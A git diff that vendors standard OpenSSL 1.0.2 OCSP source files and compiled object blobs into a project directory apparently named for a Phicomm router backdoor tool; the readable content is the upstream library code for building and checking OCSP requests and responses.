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
VcGASPe|f)a9=sT4(O=vCe*o`C8$JL4

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_cl.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_cl.c
new file mode 100644
index 0000000..b3612c8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_cl.c
@@ -0,0 +1,383 @@
+/* ocsp_cl.c */
+/*
+ * Written by Tom Titchener <Tom_Titchener@groove.net> for the OpenSSL
+ * project.
+ */
+
+/*
+ * History: This file was transfered to Richard Levitte from CertCo by Kathy
+ * Weinhold in mid-spring 2000 to be included in OpenSSL or released as a
+ * patch kit.
+ */
+
+/* ====================================================================
+ * Copyright (c) 1998-2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <time.h>
+#include <cryptlib.h>
+#include <openssl/objects.h>
+#include <openssl/rand.h>
+#include <openssl/x509.h>
+#include <openssl/pem.h>
+#include <openssl/x509v3.h>
+#include <openssl/ocsp.h>
+
+/*
+ * Utility functions related to sending OCSP requests and extracting relevant
+ * information from the response.
+ */
+
+/*
+ * Add an OCSP_CERTID to an OCSP request. Return new OCSP_ONEREQ pointer:
+ * useful if we want to add extensions.
+ */
+
+OCSP_ONEREQ *OCSP_request_add0_id(OCSP_REQUEST *req, OCSP_CERTID *cid)
+{
+    OCSP_ONEREQ *one = NULL;
+
+    if (!(one = OCSP_ONEREQ_new()))
+        goto err;
+    if (one->reqCert)
+        OCSP_CERTID_free(one->reqCert);
+    one->reqCert = cid;
+    if (req && !sk_OCSP_ONEREQ_push(req->tbsRequest->requestList, one))
+        goto err;
+    return one;
+ err:
+    OCSP_ONEREQ_free(one);
+    return NULL;
+}
+
+/* Set requestorName from an X509_NAME structure */
+
+int OCSP_request_set1_name(OCSP_REQUEST *req, X509_NAME *nm)
+{
+    GENERAL_NAME *gen;
+    gen = GENERAL_NAME_new();
+    if (gen == NULL)
+        return 0;
+    if (!X509_NAME_set(&gen->d.directoryName, nm)) {
+        GENERAL_NAME_free(gen);
+        return 0;
+    }
+    gen->type = GEN_DIRNAME;
+    if (req->tbsRequest->requestorName)
+        GENERAL_NAME_free(req->tbsRequest->requestorName);
+    req->tbsRequest->requestorName = gen;
+    return 1;
+}
+
+/* Add a certificate to an OCSP request */
+
+int OCSP_request_add1_cert(OCSP_REQUEST *req, X509 *cert)
+{
+    OCSP_SIGNATURE *sig;
+    if (!req->optionalSignature)
+        req->optionalSignature = OCSP_SIGNATURE_new();
+    sig = req->optionalSignature;
+    if (!sig)
+        return 0;
+    if (!cert)
+        return 1;
+    if (!sig->certs && !(sig->certs = sk_X509_new_null()))
+        return 0;
+
+    if (!sk_X509_push(sig->certs, cert))
+        return 0;
+    CRYPTO_add(&cert->references, 1, CRYPTO_LOCK_X509);
+    return 1;
+}
+
+/*
+ * Sign an OCSP request set the requestorName to the subjec name of an
+ * optional signers certificate and include one or more optional certificates
+ * in the request. Behaves like PKCS7_sign().
+ */
+
+int OCSP_request_sign(OCSP_REQUEST *req,
+                      X509 *signer,
+                      EVP_PKEY *key,
+                      const EVP_MD *dgst,
+                      STACK_OF(X509) *certs, unsigned long flags)
+{
+    int i;
+    OCSP_SIGNATURE *sig;
+    X509 *x;
+
+    if (!OCSP_request_set1_name(req, X509_get_subject_name(signer)))
+        goto err;
+
+    if (!(req->optionalSignature = sig = OCSP_SIGNATURE_new()))
+        goto err;
+    if (key) {
+        if (!X509_check_private_key(signer, key)) {
+            OCSPerr(OCSP_F_OCSP_REQUEST_SIGN,
+                    OCSP_R_PRIVATE_KEY_DOES_NOT_MATCH_CERTIFICATE);
+            goto err;
+        }
+        if (!OCSP_REQUEST_sign(req, key, dgst))
+            goto err;
+    }
+
+    if (!(flags & OCSP_NOCERTS)) {
+        if (!OCSP_request_add1_cert(req, signer))
+            goto err;
+        for (i = 0; i < sk_X509_num(certs); i++) {
+            x = sk_X509_value(certs, i);
+            if (!OCSP_request_add1_cert(req, x))
+                goto err;
+        }
+    }
+
+    return 1;
+ err:
+    OCSP_SIGNATURE_free(req->optionalSignature);
+    req->optionalSignature = NULL;
+    return 0;
+}
+
+/* Get response status */
+
+int OCSP_response_status(OCSP_RESPONSE *resp)
+{
+    return ASN1_ENUMERATED_get(resp->responseStatus);
+}
+
+/*
+ * Extract basic response from OCSP_RESPONSE or NULL if no basic response
+ * present.
+ */
+
+OCSP_BASICRESP *OCSP_response_get1_basic(OCSP_RESPONSE *resp)
+{
+    OCSP_RESPBYTES *rb;
+    rb = resp->responseBytes;
+    if (!rb) {
+        OCSPerr(OCSP_F_OCSP_RESPONSE_GET1_BASIC, OCSP_R_NO_RESPONSE_DATA);
+        return NULL;
+    }
+    if (OBJ_obj2nid(rb->responseType) != NID_id_pkix_OCSP_basic) {
+        OCSPerr(OCSP_F_OCSP_RESPONSE_GET1_BASIC, OCSP_R_NOT_BASIC_RESPONSE);
+        return NULL;
+    }
+
+    return ASN1_item_unpack(rb->response, ASN1_ITEM_rptr(OCSP_BASICRESP));
+}
+
+/*
+ * Return number of OCSP_SINGLERESP reponses present in a basic response.
+ */
+
+int OCSP_resp_count(OCSP_BASICRESP *bs)
+{
+    if (!bs)
+        return -1;
+    return sk_OCSP_SINGLERESP_num(bs->tbsResponseData->responses);
+}
+
+/* Extract an OCSP_SINGLERESP response with a given index */
+
+OCSP_SINGLERESP *OCSP_resp_get0(OCSP_BASICRESP *bs, int idx)
+{
+    if (!bs)
+        return NULL;
+    return sk_OCSP_SINGLERESP_value(bs->tbsResponseData->responses, idx);
+}
+
+/* Look single response matching a given certificate ID */
+
+int OCSP_resp_find(OCSP_BASICRESP *bs, OCSP_CERTID *id, int last)
+{
+    int i;
+    STACK_OF(OCSP_SINGLERESP) *sresp;
+    OCSP_SINGLERESP *single;
+    if (!bs)
+        return -1;
+    if (last < 0)
+        last = 0;
+    else
+        last++;
+    sresp = bs->tbsResponseData->responses;
+    for (i = last; i < sk_OCSP_SINGLERESP_num(sresp); i++) {
+        single = sk_OCSP_SINGLERESP_value(sresp, i);
+        if (!OCSP_id_cmp(id, single->certId))
+            return i;
+    }
+    return -1;
+}
+
+/*
+ * Extract status information from an OCSP_SINGLERESP structure. Note: the
+ * revtime and reason values are only set if the certificate status is
+ * revoked. Returns numerical value of status.
+ */
+
+int OCSP_single_get0_status(OCSP_SINGLERESP *single, int *reason,
+                            ASN1_GENERALIZEDTIME **revtime,
+                            ASN1_GENERALIZEDTIME **thisupd,
+                            ASN1_GENERALIZEDTIME **nextupd)
+{
+    int ret;
+    OCSP_CERTSTATUS *cst;
+    if (!single)
+        return -1;
+    cst = single->certStatus;
+    ret = cst->type;
+    if (ret == V_OCSP_CERTSTATUS_REVOKED) {
+        OCSP_REVOKEDINFO *rev = cst->value.revoked;
+        if (revtime)
+            *revtime = rev->revocationTime;
+        if (reason) {
+            if (rev->revocationReason)
+                *reason = ASN1_ENUMERATED_get(rev->revocationReason);
+            else
+                *reason = -1;
+        }
+    }
+    if (thisupd)
+        *thisupd = single->thisUpdate;
+    if (nextupd)
+        *nextupd = single->nextUpdate;
+    return ret;
+}
+
+/*
+ * This function combines the previous ones: look up a certificate ID and if
+ * found extract status information. Return 0 is successful.
+ */
+
+int OCSP_resp_find_status(OCSP_BASICRESP *bs, OCSP_CERTID *id, int *status,
+                          int *reason,
+                          ASN1_GENERALIZEDTIME **revtime,
+                          ASN1_GENERALIZEDTIME **thisupd,
+                          ASN1_GENERALIZEDTIME **nextupd)
+{
+    int i;
+    OCSP_SINGLERESP *single;
+    i = OCSP_resp_find(bs, id, -1);
+    /* Maybe check for multiple responses and give an error? */
+    if (i < 0)
+        return 0;
+    single = OCSP_resp_get0(bs, i);
+    i = OCSP_single_get0_status(single, reason, revtime, thisupd, nextupd);
+    if (status)
+        *status = i;
+    return 1;
+}
+
+/*
+ * Check validity of thisUpdate and nextUpdate fields. It is possible that
+ * the request will take a few seconds to process and/or the time wont be
+ * totally accurate. Therefore to avoid rejecting otherwise valid time we
+ * allow the times to be within 'nsec' of the current time. Also to avoid
+ * accepting very old responses without a nextUpdate field an optional maxage
+ * parameter specifies the maximum age the thisUpdate field can be.
+ */
+
+int OCSP_check_validity(ASN1_GENERALIZEDTIME *thisupd,
+                        ASN1_GENERALIZEDTIME *nextupd, long nsec, long maxsec)
+{
+    int ret = 1;
+    time_t t_now, t_tmp;
+    time(&t_now);
+    /* Check thisUpdate is valid and not more than nsec in the future */
+    if (!ASN1_GENERALIZEDTIME_check(thisupd)) {
+        OCSPerr(OCSP_F_OCSP_CHECK_VALIDITY, OCSP_R_ERROR_IN_THISUPDATE_FIELD);
+        ret = 0;
+    } else {
+        t_tmp = t_now + nsec;
+        if (X509_cmp_time(thisupd, &t_tmp) > 0) {
+            OCSPerr(OCSP_F_OCSP_CHECK_VALIDITY, OCSP_R_STATUS_NOT_YET_VALID);
+            ret = 0;
+        }
+
+        /*
+         * If maxsec specified check thisUpdate is not more than maxsec in
+         * the past
+         */
+        if (maxsec >= 0) {
+            t_tmp = t_now - maxsec;
+            if (X509_cmp_time(thisupd, &t_tmp) < 0) {
+                OCSPerr(OCSP_F_OCSP_CHECK_VALIDITY, OCSP_R_STATUS_TOO_OLD);
+                ret = 0;
+            }
+        }
+    }
+
+    if (!nextupd)
+        return ret;
+
+    /* Check nextUpdate is valid and not more than nsec in the past */
+    if (!ASN1_GENERALIZEDTIME_check(nextupd)) {
+        OCSPerr(OCSP_F_OCSP_CHECK_VALIDITY, OCSP_R_ERROR_IN_NEXTUPDATE_FIELD);
+        ret = 0;
+    } else {
+        t_tmp = t_now - nsec;
+        if (X509_cmp_time(nextupd, &t_tmp) < 0) {
+            OCSPerr(OCSP_F_OCSP_CHECK_VALIDITY, OCSP_R_STATUS_EXPIRED);
+            ret = 0;
+        }
+    }
+
+    /* Also don't allow nextUpdate to precede thisUpdate */
+    if (ASN1_STRING_cmp(nextupd, thisupd) < 0) {
+        OCSPerr(OCSP_F_OCSP_CHECK_VALIDITY,
+                OCSP_R_NEXTUPDATE_BEFORE_THISUPDATE);
+        ret = 0;
+    }
+
+    return ret;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_cl.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_cl.o
new file mode 100644
index 0000000000000000000000000000000000000000..83f286e1ee609b0f2a3e6d2a0a883bd3a01b4ecb
GIT binary patch
literal 6736
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
G?f(NVTYo43

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_err.c
new file mode 100644
index 0000000..722043c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_err.c
@@ -0,0 +1,149 @@
+/* crypto/ocsp/ocsp_err.c */
+/* ====================================================================
+ * Copyright (c) 1999-2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
